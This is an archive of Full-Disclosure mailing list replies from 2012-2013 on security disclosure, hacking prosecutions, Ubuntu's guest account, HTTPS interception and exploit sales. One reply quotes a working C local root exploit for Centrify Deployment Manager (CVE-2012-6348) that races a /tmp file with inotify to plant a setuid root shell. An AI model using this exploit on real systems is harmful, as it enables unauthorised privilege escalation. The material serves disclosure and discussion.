Security and Cryptography [ LPI Novell Certified Linux Engineer and Researcher [ +49 178 600 96 30 [ dan...@preussker.net [ http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x87E736968E490AA1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote: https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck Above link to remove this prosecutor needs to have signatures by February 11. http://www.amazon.com/Three-Felonies-Day-Target-Innocent/dp/1594035229, http://www.amazon.com/Three-Felonies-Day-Target-Innocent/dp/1594035229 The prosecutor has a history of abusing her power. See, for example, http://news.ycombinator.com/item?id=5126017. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
[Sorry about the crummy copy/paste]. Here's the link to the forfeiture article: http://bostonherald.com/news_opinion/local_coverage/2013/01/ortiz_motel_owner_we’re_not_done_yet On Sat, Feb 2, 2013 at 2:58 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote: https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck Above link to remove this prosecutor needs to have signatures by February 11. http://www.amazon.com/Three-Felonies-Day-Target-Innocent/dp/1594035229, http://www.amazon.com/Three-Felonies-Day-Target-Innocent/dp/1594035229 The prosecutor has a history of abusing her power. See, for example, http://news.ycombinator.com/item?id=5126017. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu, Linux Mint, and the Guest Account
It appears the Guest account is still allowed to wander around a 'stock' install of Ubuntu. Below are some examples of information leakage due to the account. Surely I'm not the only person who thinks its a bad idea to allow LightDM (a desktop manager) be a user manager or security manager. And I can't be the only fellow who thinks its a bad idea that the account is created in a non-standard way. For example, the account is not in the standard /etc/passwd or /etc/shadow database; and it cannot be disabled or removed with `usermod` or `userdel`. Finally, I can't be the only person who thinks adding the account surreptitiously is a bad idea. For example, grep'ing 'Guest' returns 0 hits because the lightdm config file lacks a comment on the guest account (and its enabled by default). Below is from a fresh Ubuntu Server install: guest-XuxS7j@utility:/$ uname -a Linux utility.home.pvt 3.2.0-36-generic-pae #57-Ubuntu SMP Tue Jan 8 22:01:06 UTC 2013 i686 i686 i386 GNU/Linux guest-XuxS7j@utility:/$ whoami guest-XuxS7j Information leak follows: guest-XuxS7j@utility:/$ cd /home/jeffrey guest-XuxS7j@utility:/home/jeffrey$ pwd /home/jeffrey guest-XuxS7j@utility:/home/jeffrey$ cd Documents guest-XuxS7j@utility:/home/jeffrey/Documents$ Information leak follows: guest-XuxS7j@utility:/home/jeffrey/Documents$ $ cat foo-bar.txt cat: foo-bar.txt: No such file or directory guest-XuxS7j@utility:/home/jeffrey/Documents$ cat Financial-Results-2012.txt cat: Financial-Results-2012.txt: Permission denied Root looks clamped: guest-XuxS7j@utility:/home/jeffrey/Documents$$ cd /root/ bash: cd: /root/: Permission denied Perhaps Ubuntu should offer an option to *not* enable the Guest account at install? Perhaps Ubuntu should encrypt all home directories by default since the Guest account is allowed to wander the file system? And fix the path hack (https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/868363). There's no reason this program should be on path. Was this program acceptance tested? The alternative - removing lightdm - creates an installation that won't boot properly. On Sat, May 5, 2012 at 7:42 PM, Jeffrey Walton noloa...@gmail.com wrote: I know there's not much new here, but I am amazed that Ubuntu, Linux Mint and friends ship with a Guest account present and enabled. The Guest account is surreptitiously added through a lightdm configuration file, and is not part of the standard user database. Because its not part of the standard user database, it can't be disabled through /etc/shadow, nor disable it through familiar tools such as userdel and usermod. Additionally, the damn account does not show up in distribution provided tools such as User Accounts applet. To make matters worse, grepping for guest returns 0 results because lightdm.conf does not mention one must add the following to disable the guest account (nothing is required to enable the account): allow-guest=false To add insult to injury, the Guest account is not sandboxed and user home directories lack sufficient ACLs, so the guest account is able to wander through user's home directories: guest-dojMxl@vb-mint-12-x64 ~ $ pwd /tmp/guest-dojMxl guest-dojMxl@vb-mint-12-x64 ~ $ whoami guest-dojMxl guest-dojMxl@vb-mint-12-x64 /home/jwalton $ cd /home/ guest-dojMxl@vb-mint-12-x64 /home $ ls -al total 12 drwxr-xr-x 3 rootroot4096 2012-05-05 16:29 . drwxr-xr-x 23 rootroot4096 2012-05-05 16:32 .. drwxr-xr-x 5 jwalton jwalton 4096 2012-05-05 16:35 jwalton guest-dojMxl@vb-mint-12-x64 ~ $ cd /home/jwalton/ guest-dojMxl@vb-mint-12-x64 /home/jwalton $ ls -al total 28 drwxr-xr-x 5 jwalton jwalton 4096 2012-05-05 16:35 . drwxr-xr-x 3 rootroot4096 2012-05-05 16:29 .. -rw-r--r-- 1 jwalton jwalton 220 2012-05-05 16:29 .bash_logout drwx-- 3 jwalton jwalton 4096 2012-05-05 16:35 .cache drwxr-xr-x 3 jwalton jwalton 4096 2012-05-05 16:29 .config drwxr-xr-x 4 jwalton jwalton 4096 2012-05-05 16:29 .mozilla -rw-r--r-- 1 jwalton jwalton 675 2012-05-05 16:29 .profile ... Is there any reason a KIOSK-like account is enabled by default? Do KIOSKs really dominate the desktop market to warrant the account out of the box? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
On Fri, Jan 25, 2013 at 12:07 PM, valdis.kletni...@vt.edu wrote: On Fri, 25 Jan 2013 09:57:51 +, Dan Ballance said: ... Doesn't matter if he ends up a corporate knob or a freedom fighter. If he says I promise to XYZ you want him to be trustworthy on said promise. You might want to ask the guys in Anonymous who got ratted out by one of their own how they feel about the word trustworthy regarding the rat who said I promise not to rat you out. :) There is no honor among thieves (or corporations, or lawyers, or...) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
On Thu, Jan 24, 2013 at 2:22 PM, valdis.kletni...@vt.edu wrote: On Thu, 24 Jan 2013 19:59:53 +0100, Stefan Weimar said: 1) The kid, as part of his major, signed an ethics document. A better solution would have been to not do the steps 1 and 2 but make an NDA (Ok, we know and you know but that's enough by now.) instead. I mean, some kind of responsible disclosure. By proposing this ethics document it was the college being unprofessional and not the kid. I think you misunderstand - the ethics document was signed *when he applied as a student. If you think that's unprofessional, you might want to consider that doctors, lawyers, and other professions have ethics standards as well. As does anybody who has a CISSP: That has not stopped lawyers and judges from perverting the legal system in the US. Judge James Ware FTW! http://en.wikipedia.org/wiki/James_Ware_(judge). https://www.isc2.org/ethics/default.aspx TLDR; Just kidding. Its actually quite short. I wonder of the college gave him a contract, and called it a code of ethics. I'd say anybody who persisted in doing something after they promised not to would be running afoul of the necessary public trust and confidence clause of the CISSP code of ethics? Well, there could be a lot of wiggle room. How much of it is subjective? Is it like Christianity, where the 10 Commandments are taken as 10 Suggestions? Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000 students personal data
On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote: Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already. If his personal information is in the proprietary system, I believe he has every right to very the security of the system. Is he allowed to opt-out of the system (probably not)? If not, he has a responsibility to check. Open question: does Canada have Security Testing and Evaluation (STE) and Reverse Engoneering (ER) exemptions in its laws? Even the United States' DMCA has them. For reference for others in the US who may be subject to bullying (companies have tried it on me): DMCA (PUBLIC LAW 105–304). It has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING. a class A moron. What does that make Omnivox, which appears to have done no testing? Jeff On 21 Jan 2013, at 21:10, Benji m...@b3nji.com wrote: He found the vulnerability by running Acunetix against the system. He is what most be would describe as, a class A moron. On Mon, Jan 21, 2013 at 8:43 PM, Frank Bures lisfr...@chem.toronto.edu wrote: A student has been expelled from Montreal’s Dawson College after he discovered a flaw in the computer system used by most Quebec CEGEPs (General and Vocational Colleges), one which compromised the security of over 250,000 students’ personal information. Ahmed Al-Khabaz, a 20-year-old computer science student at Dawson and a member of the school’s software development club, was working on a mobile app to allow students easier access to their college account when he and a colleague discovered what he describes as “sloppy coding” in the widely used Omnivox software which would allow “anyone with a basic knowledge of computers to gain access to the personal information of any student in the system, including social insurance number, home address and phone number, class schedule, basically all the information the college has on a student.” http://tinyurl.com/bcdrelh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000 students personal data
On Mon, Jan 21, 2013 at 5:57 PM, Ian Hayes cthulhucall...@gmail.com wrote: On Mon, Jan 21, 2013 at 2:54 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote: a class A moron. What does that make Omnivox, which appears to have done no testing? The two conditions are not mutually exclusive. Hence the reason for appears to have done no testing. Developer driven security is some of the worst security I have seen. Its the reason for this (and few other) list. Obvious flaws (obvious to a security professional) tells me Omnivox has problems with their engineering process (perhaps incomplete testing, perhaps no testing). Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000 students personal data
On Mon, Jan 21, 2013 at 7:44 PM, Julius Kivimäki julius.kivim...@gmail.com wrote: How is Omnivox's security relevant when this kid is running DoS tools on their sites? (Acunetix is a nice database heavy HTTP flood tool.) I don't know. Could Acunetix be used to find a 250,000 record information leak (injection?)? If not, perhaps it was exaggerated by the site's owner in order to deflect bad press and tip the scales of justice. Manipulating the justice system is nothing new. Ma Bell did it with Mitnick. They claimed millions in losses due to Mitnick, but failed to list it in their SEC filings (required by law at the time). They would not answer questions pertaining to the 'accounting irregularities' when cross examined during tial. Jeff 2013/1/22 Jeffrey Walton noloa...@gmail.com On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote: Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already. If his personal information is in the proprietary system, I believe he has every right to very the security of the system. Is he allowed to opt-out of the system (probably not)? If not, he has a responsibility to check. Open question: does Canada have Security Testing and Evaluation (STE) and Reverse Engoneering (ER) exemptions in its laws? Even the United States' DMCA has them. For reference for others in the US who may be subject to bullying (companies have tried it on me): DMCA (PUBLIC LAW 105–304). It has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING. a class A moron. What does that make Omnivox, which appears to have done no testing? Jeff On 21 Jan 2013, at 21:10, Benji m...@b3nji.com wrote: He found the vulnerability by running Acunetix against the system. He is what most be would describe as, a class A moron. On Mon, Jan 21, 2013 at 8:43 PM, Frank Bures lisfr...@chem.toronto.edu wrote: A student has been expelled from Montreal’s Dawson College after he discovered a flaw in the computer system used by most Quebec CEGEPs (General and Vocational Colleges), one which compromised the security of over 250,000 students’ personal information. Ahmed Al-Khabaz, a 20-year-old computer science student at Dawson and a member of the school’s software development club, was working on a mobile app to allow students easier access to their college account when he and a colleague discovered what he describes as “sloppy coding” in the widely used Omnivox software which would allow “anyone with a basic knowledge of computers to gain access to the personal information of any student in the system, including social insurance number, home address and phone number, class schedule, basically all the information the college has on a student.” http://tinyurl.com/bcdrelh ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
On Mon, Jan 21, 2013 at 8:06 PM, Nick FitzGerald n...@virus-l.demon.co.uk wrote: Jeffrey Walton wrote: On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote: Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already. If his personal information is in the proprietary system, I believe he has every right to very the security of the system. BUT how can he verify (I assume that was the word you meant?) proper security of _his_ personal details? He would have to test using someone _else's_ access credentials. That is unauthorized access by most relevant legislation in most jurisdictions. Yes, my bad. Autocorrect has turned my bad spelling into bad grammar. Alternately, he could try accessing someone else's data from his login, and that is equally clearly unauthorized access. He and his colleague who originally discovered the flaw may have used each other's access credentials to access their own data, or used their own credentials to access the other's data _in agreement between themselves_ BUT in so doing most likely broke the terms of service of the system/their school/etc, _equally_ putting them afoul of most unauthorized access legislation. Is he allowed to opt-out of the system (probably not)? If not, he has a responsibility to check. BUT he has no responsibility to check on anyone _else's_ data and no _authority_ to use anyone else's credentials to check on his own. I would argue that's part of testing the system. If I log in and get a token back, I'm going to try a simple increment (and other transformations on the token) to see if its predictable. If I happen to get another's record, that demonstrates the flaw in the system and not 'testing on behalf of another'. What did he do with the other records he retireived? I suspect he used them as proof of concept; and did not use them for a work visa or credit card. But I could be wrong. So, what responsibility does he really have? We have the responsibility to protect our own data, because class-A fuckups like Omnivox don't do it. Once the data is lost, you can't get it back - the genie is out of the bottle. That's coming from a guy who was part of a breach in the 1990s. It cost me about $10,000 to fix it back then. It started again in the mid-2000's. I'm not fixing it this time. It sounds like he should have left well alone once he had reported this to the university and the vendors. That he did not have the sense or moral compass to recognize that tells us something important about him. Does that sword cut both ways? How about Nokia/Opera and their destrucion of the secure channel? How about Trustwave and their fraudulent certifcates that destroyed the secure channel? Or do these things (law and moral compasses) only apply to individuals? Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote: https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck Above link to remove this prosecutor needs to have signatures by February 11. Congratulations. It looks like you exceeded the threshold required by a factor of nearly two. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] White Paper: Detecting System Intrusions
On Fri, Jan 18, 2013 at 3:21 PM, valdis.kletni...@vt.edu wrote: On Wed, 16 Jan 2013 12:39:18 -0500, Almaz said: How to detect system intrusions? What are the techniques? Can one character difference in the output be an indicator of compromise? Paging Cliff Stoll.. Cliff Stoll to the courtesy phone... Damn You can only get The KGB, the Computer, and Me on VHS! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to prevent HTTPS MitM
On Thu, Jan 17, 2013 at 3:56 PM, Luigi Rosa li...@luigirosa.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 If this message is offtopic, please excuse me. I was reading about Nokia HTTPS MitM. Many corporate firewall can MitM HTTPS for content inspection and many governments do this for their reasons. I was thinking: could it be possible to create a fake HTTPS stream to DoS the MitM attempt? Stop conferring trust. Pin the certifcate or public key. Google used it to vet out the Diginotar compromise in Chrome (all other browsers suffered). Its similar to SSH's StrictHostKeyChecking option. Its also on track for internet standards: http://tools.ietf.org/html/draft-ietf-websec-key-pinning-04. Use Secure Remote Password (SRP). SRP is basically Diffei-Hellman using the password as an exponent (lots of handwaiving). Don't trust browsers. That includes Mozilla (Trustwave and the closed door, back room deals) or Opera (Nokia and its 'Acceleration Interception'). Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to sell and get a fair price
On Wed, Jan 16, 2013 at 5:19 AM, grem...@gremlin.ru wrote: On 15-Jan-2013 06:28:53 -0500, Jeffrey Walton wrote: ... Is it really necessary to stay anonymous? Writing hmmm... articles about vulnerabilities for some (very specific) media and getting a hmmm... fee for that is mostly legal. Opposed to the use of that information... I think its a slippery slope in the US. I'm happy to reside outside of the US... On one hand, you have, for example, Computer Fraud and Abuse Act (FCAA), Digital Millennium Copyright Act (DMCA), and Unlawful Intercept. US corporations are rarely prosecuted under the law [...] but individuals are regularly prosecuted That means, all these activities should not be performed in the US (and other countries with similar Draconian laws)... Its not so much Draconian laws as it is greedy politicians who take bribes from corporate america to grow their wealth, and then spend the rest of their careers performing fellatio on industry and their special interests (just an observation :). In general, this problem may be solved using the international division of labour, when people do only what is legal in their country. Example: reverse engineering is legal in Russia (unless it is used to create the competing product), so I can perform it and share the results. Someone else may then find suspicious code, other people may prove that code is vulnerable by writing an exploit... In this case, everyone performs in legal manner - except, obviously, the script kiddies who will use the ready tool to break something. Its legal in the US, too. Dr. Jon Callas (one of PGP's co-founders) was fortunate (persistent?) enough to have the provisions added to DMCA (PUBLIC LAW 105–304). It has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to sell and get a fair price
On Tue, Jan 15, 2013 at 2:48 AM, grem...@gremlin.ru wrote: On 14-Jan-2013 15:39:53 -0500, valdis.kletni...@vt.edu wrote: After all, a vulnerability and an exploit are intellectual products. Not sure copyright could be claimed, but why not? Actually, claimed or not, if the exploit was coded in a Berne signatory country, it's almost always automatically copyrighted at creation (most likely to the coder, or to their employer if it was a work-for-hire). [...] More interesting is the question of how to enforce a copyright claim while remaining anonymous... Is it really necessary to stay anonymous? Writing hmmm... articles about vulnerabilities for some (very specific) media and getting a hmmm... fee for that is mostly legal. Opposed to the use of that information... I think its a slippery slope in the US. On one hand, you have, for example, Computer Fraud and Abuse Act (FCAA), Digital Millennium Copyright Act (DMCA), and Unlawful Intercept. US corporations are rarely prosecuted under the law (confer, Trustwave [1], Nokia [2]); but individuals are regularly prosecuted (confer, Weev (et al) [3], Wise Guys [4], Dmitry Sklyarov [5]). I'm amazed at how federal law is 'opt-in' for US corporations, but individuals such as Weev/Goatse and Sklyarov must endure politically motivated judicial heavy handedness. In Goatse's case, they aggregated public data (names and email addresses) from a public server offering public services hanging off a public internet. In Sklyarov case, he demonstrated flaws in Adobe's PDF DRM scheme. Note that for Sklyarov, the DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING). The STE exemption is in Section 1205 (i) SECURITY TESTING. If I had copyright over material used for security testing and evaluations, I would probably assert my copyright. If I wrote malware, I would likely want to stay anonymous (confer, David L. Smith and Melissa macro-virus [6]). Jeff [1] http://www.computerworld.com/s/article/9224082/Trustwave_admits_issuing_man_in_the_middle_digital_certificate_Mozilla_debates_punishment [2] http://www.zdnet.com/nokia-hijacks-mobile-browser-traffic-decrypts-https-data-709655/ [3] http://en.wikipedia.org/wiki/Weev [4] https://www.eff.org/deeplinks/2010/07/cfaa-prosecution-wiseguys-not-so-smart [5] http://en.wikipedia.org/wiki/Dmitry_Sklyarov [6] http://en.wikipedia.org/wiki/Melissa_(computer_virus) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to sell and get a fair price
On Tue, Jan 15, 2013 at 10:40 AM, Mikhail A. Utin mu...@commonwealthcare.org wrote: In general practice, where ever you would like to publish, the publisher will ask for copyright rights. Thus, a site publishing exploits can do the same and thus may protect rights of the author, well, together with its ones. After all, my idea was about fare sale, and that could require release of rights to the mediator/auctioneer. Somebody I would bet is having a fair thought “buddy, would you do your idea?” I need to say frankly that I do not plan. I’m stretched by my current www.201cmr1700ma.com and its very likely extension. But feeling unfairness, will be glad to support and devout some time. Sometimes the publisher cannot protect the identity of an anonymous author. The real Rex Feral was dragged into court. http://en.wikipedia.org/wiki/Hit_Man:_A_Technical_Manual_for_Independent_Contractors Jeff From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Monday, January 14, 2013 4:17 PM To: Valdis Kletnieks Cc: Mikhail A. Utin; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] how to sell and get a fair price Valdis, we've had spam companies suing blacklist/antispam companies before... Surely an anonymous person legitimately and legally enforcing copyright can't be harder? On Mon, Jan 14, 2013 at 9:39 PM, valdis.kletni...@vt.edu wrote: On Thu, 10 Jan 2013 12:03:03 -0500, Mikhail A. Utin said: After all,a vulnerability and an exploit are intellectual products. Not sure copyright could be claimed, but why not? Actually, claimed or not, if the exploit was coded in a Berne signatory country, it's almost always automatically copyrighted at creation (most likely to the coder, or to their employer if it was a work-for-hire). In the US, there's a exemption for work product of federal employees - that's one of the few ways for US-produced material to become public domain (expiration of term is the other one, but with ever-increasing copyright terms, it's unclear that anything will ever actually expire in the US). More interesting is the question of how to enforce a copyright claim while remaining anonymous... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to sell and get a fair price
On Tue, Jan 15, 2013 at 3:07 PM, Nick FitzGerald n...@virus-l.demon.co.uk wrote: Jeffrey Walton wrote: Sometimes the publisher cannot protect the identity of an anonymous author. ... That may be true -- I don't know... ... The real Rex Feral was dragged into court. http://en.wikipedia.org/wiki/Hit_Man:_A_Technical_Manual_for_Independent_Contractors ...but that claim is not supported by your reference. The Wikipedia article simply does not address whether the pseudonymous author's real identity was exposed in the legal preceedings or not. Note that the case was Rice v Paladin Enterprises and the legal claim was that Paladin (the _publishers_) aided and abetted a murder. Oh, my bad. That was the book which caused the subsequent court actions, and not a normative reference to loss of anonymity. Presumably (again, IANAL) they could have brought a similar suit against the author, but saw the publisher as having deeper pockets (and perhaps reasonably assumed, or even knew, that the publisher would have extensive commercial insurance to cover any damages ruling they may receive if their case prevailed). I seem to recall two or three things from the Montgomery County murders (its a county close to where I live, so I watched the American Justice episode). The publisher indemnified the author. The publisher was not able to retain anonymity for Rex Feral. In fact, I seem to recall an excerpt of the court proceedings with the lady on the stand. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote: https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck Above link to remove this prosecutor needs to have signatures by February 11. Its unfortunate Schwartz committed suicide over the incident. http://www.latimes.com/news/obituaries/la-me-0113-aaron-swartz-20130113,0,5232490.story Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 3:35 PM, valdis.kletni...@vt.edu wrote: On Mon, 14 Jan 2013 11:02:26 -0500, Jeffrey Walton said: On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote: https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck Above link to remove this prosecutor needs to have signatures by February 11. Its unfortunate Schwartz committed suicide over the incident. From the fine article: On his blog, Swartz had written of his history of depression. Given that, and the fact that the article doesn't mention a suicide note stating Aaron's reasons, it's not entirely clear that he in fact committed suicide over the incident. It may have been one factor out of many. Perhaps. In the absence of a note, all we have to go on is the family and girlfriends experience with his personality: On Saturday, his family and girlfriend called his death the product of a criminal justice system rife with intimidation and prosecutorial overreach and blamed decisions by the Massachusetts U.S. attorney's office and MIT for contributing to his death. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager v2.1.0.283 local root
I've got a feeling you will not be sent to anymore vendor classes :) On Tue, Dec 18, 2012 at 3:49 PM, Larry W. Cashdollar lar...@me.com wrote: /*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root, Centrify released a fix very quickly - nice vendor response. http://vapid.dhs.org/exploits/centrify_local_r00t.c CVE-2012-6348 12/17/2012 http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html Greetings vladz, Thanks for the inotify syscall technique. This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php Run the exploit and wait for administrator to analyse or deploysoftware to the system. larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0 [*] Launching attack against centrify.cmd.0 [+] Creating evil script (/tmp/evil) [+] Creating target file (/bin/touch /tmp/centrify.cmd.0) [+] Initialize inotify [+] Waiting for root to launch centrify.cmd.0 [+] Opening root shell (/tmp/sh) # Larry W. Cashdollar @_larry0 */ #include stdlib.h #include stdio.h #include unistd.h #include sys/stat.h #include sys/types.h #include string.h #include sys/inotify.h #include fcntl.h #include sys/syscall.h /*Create a small c program to pop us a root shell*/ int create_nasty_shell(char *file) { char *s = #!/bin/bash\n echo 'main(){setuid(0);execve(\/bin/sh\,0,0);}'/tmp/sh.c\n cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n chmod 4755 /tmp/sh;\n; int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO); write(fd, s, strlen(s)); close(fd); return 0; } int main(int argc, char **argv) { int fd, wd; char buf[1], *targetpath, *cmd, *evilsh = /tmp/evil, *trash = /tmp/trash; if (argc 2) { printf(Usage: %s target file \n, argv[0]); return 1; } printf([*] Launching attack against \%s\\n, argv[1]); printf([+] Creating evil script (/tmp/evil)\n); create_nasty_shell(evilsh); targetpath = malloc(sizeof(argv[1]) + 6); cmd = malloc(sizeof(char) * 32); sprintf(targetpath, /tmp/%s, argv[1]); sprintf(cmd,/bin/touch %s,targetpath); printf([+] Creating target file (%s)\n,cmd); system(cmd); printf([+] Initialize inotify\n); fd = inotify_init(); wd = inotify_add_watch(fd, targetpath, IN_ATTRIB); printf([+] Waiting for root to change perms on \%s\\n, argv[1]); syscall(SYS_read, fd, buf, 1); syscall(SYS_rename, targetpath, trash); syscall(SYS_rename, evilsh, targetpath); inotify_rm_watch(fd, wd); printf([+] Opening root shell (/tmp/sh)\n); sleep(2); system(rm -fr /tmp/trash;/tmp/sh || echo \[-] Failed.\); return 0; } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [btrfs] is vulnerable to a hash-DoS attack
On Thu, Dec 13, 2012 at 8:20 AM, Pascal Junod (Mailing Lists) mailingli...@junod.info wrote: Hello folk, The btrfs file system, part of the linux kernel, is vulnerable to a trivial hash-DoS attack. More details can be found here: http://crypto.junod.info/2012/12/13/hash-dos-and-btrfs/ Kosta's comment was funny as hell: If only the B-Tree Filesystem had access to a data structure immune to this… like a B-Tree. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google's robots.txt handling
On Thu, Dec 13, 2012 at 7:52 AM, Philip Whitehouse phi...@whiuk.com wrote: I restate my email's second point. Google is indexing robots.txt because (from all the examples I can see) robots.txt doesn't contain a line to disallow indexing of robots.txt It is possible that some web sites provide actual content in a file that happens to be called robots.txt (e.g a website concerned with AI development). Could Google do better by removing the file? Sure. But as webmasters haven't told them not to, even though they have provided other files not to index, Google is doing exactly what they were asked. Webmasters don't have to in the US - the Computer Fraud and Abuse Act (CFAA) means Google (et al) must operate within the authority granted by the webmasters. If that means the webmasters decide they don't want their site crawled, then Google (et al) has exceeded its authority and broken US Federal law. Just ask Weev. This system needs a submission based whitelist. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google's robot.txt handling
